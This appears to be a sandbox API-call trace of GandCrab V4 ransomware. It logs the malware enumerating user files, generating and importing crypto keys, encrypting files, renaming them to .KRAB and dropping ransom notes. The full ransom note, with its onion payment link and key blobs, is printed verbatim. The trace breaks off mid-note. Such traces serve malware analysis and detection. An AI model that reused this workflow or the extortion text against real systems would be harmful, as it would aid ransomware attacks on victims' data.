lstrcmpiW (lpString1="jpg95_MxI58ijuhWkA1.gif", lpString2="autorun.inf") returned 1 [0057.463] lstrcmpiW (lpString1="jpg95_MxI58ijuhWkA1.gif", lpString2="ntuser.dat") returned -1 [0057.463] lstrcmpiW (lpString1="jpg95_MxI58ijuhWkA1.gif", lpString2="iconcache.db") returned 1 [0057.463] lstrcmpiW (lpString1="jpg95_MxI58ijuhWkA1.gif", lpString2="bootsect.bak") returned 1 [0057.463] lstrcmpiW (lpString1="jpg95_MxI58ijuhWkA1.gif", lpString2="boot.ini") returned 1 [0057.463] lstrcmpiW (lpString1="jpg95_MxI58ijuhWkA1.gif", lpString2="ntuser.dat.log") returned -1 [0057.463] lstrcmpiW (lpString1="jpg95_MxI58ijuhWkA1.gif", lpString2="thumbs.db") returned -1 [0057.463] lstrcmpiW (lpString1="jpg95_MxI58ijuhWkA1.gif", lpString2="KRAB-DECRYPT.html") returned -1 [0057.463] lstrcmpiW (lpString1="jpg95_MxI58ijuhWkA1.gif", lpString2="KRAB-DECRYPT.txt") returned -1 [0057.463] lstrcmpiW (lpString1="jpg95_MxI58ijuhWkA1.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0057.463] lstrcmpiW (lpString1="jpg95_MxI58ijuhWkA1.gif", lpString2="ntldr") returned -1 [0057.464] lstrcmpiW (lpString1="jpg95_MxI58ijuhWkA1.gif", lpString2="NTDETECT.COM") returned -1 [0057.464] lstrcmpiW (lpString1="jpg95_MxI58ijuhWkA1.gif", lpString2="Bootfont.bin") returned 1 [0057.464] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.464] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbca08) returned 1 [0057.466] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.466] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.466] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.466] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0057.466] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.466] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.466] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbca08) returned 1 [0057.467] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.467] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.467] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.467] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0057.467] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.468] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.468] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbca08) returned 1 [0057.468] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd420) returned 1 [0057.468] CryptGetKeyParam (in: hKey=0xfbd420, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0057.468] CryptEncrypt (in: hKey=0xfbd420, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0057.469] GetLastError () returned 0x0 [0057.469] CryptDestroyKey (hKey=0xfbd420) returned 1 [0057.469] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.469] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbca08) returned 1 [0057.469] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd1a0) returned 1 [0057.469] CryptGetKeyParam (in: hKey=0xfbd1a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0057.469] CryptEncrypt (in: hKey=0xfbd1a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0057.470] GetLastError () returned 0x0 [0057.470] CryptDestroyKey (hKey=0xfbd1a0) returned 1 [0057.470] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.470] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\jpg95_MxI58ijuhWkA1.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\jpg95_mxi58ijuhwka1.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0057.470] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.470] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0057.471] ReadFile (in: hFile=0x43c, lpBuffer=0x35f0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x35f0000*, lpNumberOfBytesRead=0x338ef7c*=0xd41, lpOverlapped=0x0) returned 1 [0057.485] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffff2bf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.485] WriteFile (in: hFile=0x43c, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0xd41, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ef78*=0xd41, lpOverlapped=0x0) returned 1 [0057.485] WriteFile (in: hFile=0x43c, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0057.485] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.490] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.490] CloseHandle (hObject=0x43c) returned 1 [0057.491] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.491] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\jpg95_MxI58ijuhWkA1.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\jpg95_mxi58ijuhwka1.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\jpg95_MxI58ijuhWkA1.gif.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\jpg95_mxi58ijuhwka1.gif.krab")) returned 1 [0057.492] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.492] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0057.492] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0057.492] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0057.492] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\KRAB-DECRYPT.txt" [0057.492] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.492] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\KRAB-DECRYPT.txt.KRAB") returned 59 [0057.492] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\KRAB-DECRYPT.txt") returned 54 [0057.492] lstrlenW (lpString=".txt") returned 4 [0057.492] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.493] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0057.493] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.493] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\KRAB-DECRYPT.txt") returned 54 [0057.493] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\KRAB-DECRYPT.txt") returned 54 [0057.493] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0057.493] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0057.493] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0057.493] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0057.493] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0057.493] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0057.493] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0057.493] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0057.493] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0057.493] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0057.493] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.493] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0057.493] lstrcmpW (lpString1="Macromedia", lpString2=".") returned 1 [0057.494] lstrcmpW (lpString1="Macromedia", lpString2="..") returned 1 [0057.494] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="Macromedia" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia" [0057.494] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\" [0057.494] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0057.494] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0057.494] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0057.494] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0057.494] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0057.494] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.494] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.494] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\\\KRAB-DECRYPT.txt") returned 66 [0057.495] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0057.500] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0057.500] WriteFile (in: hFile=0x43c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0057.501] CloseHandle (hObject=0x43c) returned 1 [0057.501] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.501] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.503] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x4, wMilliseconds=0x2be)) [0057.504] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.504] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0057.504] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0057.504] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\d2ca4a08d2ca4dee3d.lock") returned 72 [0057.504] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x43c [0057.507] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.507] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.507] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\") returned 49 [0057.507] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\*" [0057.508] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0xfbd4a0 [0057.508] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.508] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0057.508] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.508] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.508] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0057.508] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0057.508] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0057.508] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\d2ca4a08d2ca4dee3d.lock" [0057.508] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.508] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 77 [0057.508] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\d2ca4a08d2ca4dee3d.lock") returned 72 [0057.508] lstrlenW (lpString=".lock") returned 5 [0057.508] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.509] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0057.509] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.509] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.509] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0057.509] lstrcmpW (lpString1="Flash Player", lpString2=".") returned 1 [0057.509] lstrcmpW (lpString1="Flash Player", lpString2="..") returned 1 [0057.509] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\", lpString2="Flash Player" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player" [0057.509] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\" [0057.509] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0057.509] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0057.510] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0057.510] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0057.510] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0057.510] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.510] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.510] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\\\KRAB-DECRYPT.txt") returned 79 [0057.510] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0057.512] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA 